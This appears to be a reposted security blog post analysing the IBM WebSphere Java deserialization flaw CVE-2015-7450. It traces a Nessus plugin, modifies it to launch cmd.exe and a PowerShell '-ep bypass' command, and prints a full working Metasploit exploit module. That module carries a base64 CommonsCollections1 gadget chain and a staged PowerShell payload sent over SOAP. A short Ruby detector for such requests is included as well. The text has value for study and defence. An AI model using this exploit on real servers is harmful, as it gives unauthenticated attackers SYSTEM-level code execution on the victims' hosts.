IBM WebSphere Java Deserialization Vulnerability Analysis

Nessus is the go-to vulnerability scanner for finding potential vulnerabilities. While going through a Nessus report I came across a well-known vulnerability in IBM's WebSphere Application Server.

NESSUS REPORT

The Nessus report states that the following critical vulnerability exists in the IBM WAS instance and that it can be exploited through Java deserialization by sending a crafted Java object.

[Screenshot: Nessus report]

Vulnerability information

CVE ID: CVE-2015-7450

Description: Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library.

More information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450

APPROACH

Nessus analysis

I was curious how Nessus was able to exploit the vulnerability it reported above. The plugin ID is 87171, so I ran a quick grep to find the plugin's full name and continued the analysis from there.

[Screenshot: grep output showing the responsible plugin, 'name:id']

Nessus plugins are written in NASL (Nessus Attack Scripting Language), which is simple and easy to work with. Further information and examples on running the nasl command-line tool are available from Tenable.

The plugin's NASL code is straightforward. It first performs some information gathering on the host operating system, then sends a request to the default port (8880) on which the WAS SOAP connector listens.

[Screenshot: plugin NASL code]

Intercepting the traffic, we see the following SOAP response.

[Screenshot: SOAP response captured in Burp]

The following NASL lines do exactly what they say: depending on the host operating system, the vulnerable application is made to send an ICMP echo request back to the scanner. Our WAS instance is installed on Windows Server 2008 R2, so the command that gets executed is:

ping -n 10 192.168.1.7

where 192.168.1.7 is the host running Nessus.

[Screenshot: ping]

The rest of the code builds a suitable SOAP request wrapping the arbitrary ping command and POSTs it to the target.

[Screenshots: SOAP request construction in the NASL code]
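As an added example (not code from the original post, the Nessus plugin or the Metasploit module), the following stand-alone Ruby shows the defender's side of the request just described: it pulls the base64 `objectname` out of a getAttribute SOAP body, decodes it, checks for the Java serialization stream magic (0xACED 0005) and flags streams that reference the Commons Collections gadget classes. The SOAP envelope shape is the one the plugin sends; the two request bodies are constructed stand-ins (only the class-name strings are reproduced, not a full gadget chain), and the check is string-based, so a production detector should parse the stream rather than grep it.

```ruby
# Added example: detect a Commons Collections gadget chain inside a WebSphere
# SOAP-connector getAttribute request. Sample inputs are constructed below.

JAVA_STREAM_MAGIC = "\xAC\xED\x00\x05".b   # STREAM_MAGIC + STREAM_VERSION

# Class names that appear as class descriptors in the CommonsCollections1 chain.
GADGET_CLASS_NAMES = [
  "org.apache.commons.collections.functors.InvokerTransformer",
  "org.apache.commons.collections.functors.ChainedTransformer",
  "org.apache.commons.collections.map.LazyMap",
  "sun.reflect.annotation.AnnotationInvocationHandler",
].freeze

def b64_encode(bytes)
  [bytes].pack("m0")
end

def b64_decode_strict(text)
  text.unpack("m0").first   # raises ArgumentError on anything that is not valid base64
end

# Text of the <objectname> element (attributes ignored, case-insensitive).
def extract_objectname(soap_body)
  m = soap_body.match(%r{<objectname\b[^>]*>(.*?)</objectname>}mi)
  m && m[1].strip
end

# Verdict for one SOAP request body.
def inspect_soap_request(soap_body)
  b64 = extract_objectname(soap_body)
  return { verdict: :no_objectname } unless b64
  begin
    blob = b64_decode_strict(b64.gsub(/\s+/, ""))
  rescue ArgumentError
    return { verdict: :not_base64 }
  end
  return { verdict: :not_java_stream } unless blob.start_with?(JAVA_STREAM_MAGIC)
  hits = GADGET_CLASS_NAMES.select { |name| blob.include?(name.b) }
  hits.empty? ? { verdict: :java_stream, gadgets: [] } : { verdict: :suspicious_gadget_chain, gadgets: hits }
end

# The getAttribute envelope used by the WebSphere SOAP connector (as in the plugin).
def soap_get_attribute(objectname_b64)
  <<-XML
<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
<ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">#{objectname_b64}</objectname>
<attribute xsi:type="xsd:string">ringBufferSize</attribute>
</ns1:getAttribute>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
  XML
end

# Constructed samples: a stand-in for a serialized javax.management.ObjectName
# and a stand-in carrying the InvokerTransformer class descriptor.
BENIGN_BLOB    = JAVA_STREAM_MAGIC + "\x73\x72\x00\x1Bjavax.management.ObjectName".b
MALICIOUS_BLOB = JAVA_STREAM_MAGIC + "\x73\x72\x00\x3Aorg.apache.commons.collections.functors.InvokerTransformer".b

def sample_verdicts
  {
    benign:    inspect_soap_request(soap_get_attribute(b64_encode(BENIGN_BLOB))),
    malicious: inspect_soap_request(soap_get_attribute(b64_encode(MALICIOUS_BLOB))),
    garbage:   inspect_soap_request(soap_get_attribute("not base64!!")),
  }
end

if __FILE__ == $0
  sample_verdicts.each { |name, verdict| puts "#{name}: #{verdict.inspect}" }
end
```

A legitimate admin client also sends a serialized ObjectName here, so the magic bytes alone are not a signal; the gadget class names (or, better, a proper stream parser with a class allow-list) are what separate the exploit from normal JMX traffic.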

I was curious whether, instead of the ping, I could run a command of my own, such as launching cmd.exe with no further arguments. The tricky part is the line that constructs the ping command, so we modify that part of the code as follows.

# Original ping construction commented out; the command we want executed is substituted instead
# if("windows" >< tolower(os)) ping_cmd = "ping -n 10 ";
# else ping_cmd = "ping -c 10 -p " + string(id_tag) + " ";
rce_cmd = "cmd.exe";
# ping_cmd += this_host();
ping_cmd = rce_cmd;

I commented out the if/else block, ran the OS fingerprinting again (the remote host was confirmed to be running Windows Server 2008 R2), then launched the nasl tool and waited for the cmd process to start on the remote system. At this point I want to say a big thank you to Alexios Dimitriadis, who after a lot of research worked out how to run nasl correctly.

Note: during script execution, if the audit-trail option is added, the following verbose message may appear. The script reports that port 8880 is not affected, but in this case that is a false positive: the NASL script waits for the ping request to verify the vulnerability, and our modified command never sends one.

[Screenshot: nasl script output]

Checking the running processes on the target machine alongside the script execution, our cmd.exe process has been started under java.exe and is running with SYSTEM privileges under the Java platform.

[Screenshot: cmd.exe process under java.exe]

INTERACTING WITH METASPLOIT

Web delivery payload analysis

At this point I tried a simple approach to verify whether PowerShell could be used for further exploitation, so I embedded the following PowerShell line in the NASL script.

rce_cmd = "powershell.exe -nop -ep bypass -c ping 192.168.1.7";

Nessus verified once more that exploitation succeeded and the ping came back to my host.

[Screenshot: nasl run and process list on the target]

The first thing that came to mind was to start Metasploit's web_delivery module and paste its generated command into the NASL script. This resulted in a nice, fully staged session coming back.

[Screenshot: Metasploit web_delivery session]

CREATING A METASPLOIT MODULE

To make controlling and exploiting the vulnerable host easier, I started writing my own Metasploit module. You can find it in the main metasploit-framework repository on GitHub, and you can follow our discussion in the module's pull request queue.

You can download and use it in case you face the vulnerability above, but you are advised not to use it to harm others.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM WebSphere RCE Java Deserialization Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
        call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
        remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Liatsis Fotios @liatsisfotios' # Metasploit Module

          # Thanks for helping me:
          # Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module
          # Dimitriadis Alexios @AlxDm_ # Assistance and code check
          # Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation
        ],
      'References'     =>
        [
          ['CVE', '2015-7450'],
          ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
          ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
          ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IBM WebSphere 7.0.0.0', {} ]
        ],
      'DisclosureDate' => "Nov 6 2015",
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'SSL'      => true,
        'WfsDelay' => 20
      }))

    register_options([
      OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
      Opt::RPORT(8880)
    ], self.class)
  end

  def exploit
    # Decode - Generate - Set Payload / Send SOAP Request
    soap_request(set_payload)
  end

  def set_payload
    # CommonsCollections1 serialized stream (ysoserial), split at the point where the
    # command string goes. ccs_start ends with a TC_STRING tag (0x74); gen_payload
    # supplies the length-prefixed command bytes and ccs_end resumes the stream
    # (the "exec" method name and the remaining objects).
    ccs_start = <<-B64.gsub(/\s+/, '')
      rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAg
      ACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudX
      RpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdG
      lvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAA
      dmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbn
      MuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYX
      BhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVH
      JhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW
      50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW
      1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+
      j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2
      lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2
      V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS
      5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdn
      IAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAH
      hwAAAAAXQ=
    B64
    ccs_end = <<-B64.gsub(/\s+/, '')
      dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4c
      gAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG
      9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo=
    B64

    # Generate Payload: splice the command into the stream and base64 it for the ObjectName element
    payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
    Rex::Text.encode_base64(payload_exec)
  end

  def invoke_ccs(serialized_stream)
    # Decode Serialized Streams
    Rex::Text.decode_base64(serialized_stream)
  end

  def gen_payload
    # Staging Native Payload: a PowerShell one-liner, with the cmd.exe wrapper removed
    exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")

    # Size up RCE - Buffer: a Java TC_STRING body is a big-endian two-byte length
    # followed by the (modified UTF-8) bytes, so the length is packed as "n".
    # (A "0" + hex string packed with H* only works for three-digit hex lengths.)
    if exec_cmd.bytesize > 0xFFFF
      fail_with(Failure::BadConfig, "Payload is too long for a Java TC_STRING (max 65535 bytes)")
    end
    buff = [exec_cmd.bytesize].pack("n")

    buff + exec_cmd
  end

  def soap_request(inject_payload)
    # SOAP Request: a getAttribute call on the WebSphere SOAP connector (JMX over SOAP)
    # whose ObjectName argument is the base64 serialized gadget chain
    req  = "<?xml version='1.0' encoding='UTF-8'?>\r\n"
    req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n"
    req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\r\n"
    req += "<LoginMethod>BasicAuth</LoginMethod>\r\n"
    req += "</SOAP-ENV:Header>\r\n"
    req += "<SOAP-ENV:Body>\r\n"
    req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n"
    req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>\r\n"
    req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>\r\n"
    req += "</ns1:getAttribute>\r\n"
    req += "</SOAP-ENV:Body>\r\n"
    req += "</SOAP-ENV:Envelope>\r\n"

    uri = target_uri.path

    res = send_request_raw({
      'method'      => 'POST',
      'version'     => '1.1',
      'raw_headers' => "Content-Type: text/xml; charset=utf-8\r\nSOAPAction: \"urn:AdminService\"\r\n",
      'uri'         => normalize_uri(uri),
      'data'        => req
    })
    res
  end

end

Quick demo: https://youtu.be/HGEGMAnSj7I

References:

* Source: liatsisfotis; compiled and published by the MottoIN editors. Please credit MottoIN when reposting.



Original link: www.mottoin.com